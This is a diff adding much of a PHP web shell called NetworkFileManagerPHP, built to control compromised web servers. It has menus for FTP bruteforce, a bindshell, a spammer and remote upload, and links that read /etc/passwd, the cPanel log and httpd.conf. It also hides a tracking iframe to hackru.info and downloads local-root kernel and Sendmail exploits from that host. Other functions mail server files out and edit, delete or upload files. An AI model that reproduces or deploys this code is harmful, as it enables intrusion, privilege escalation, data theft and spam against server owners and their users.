+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
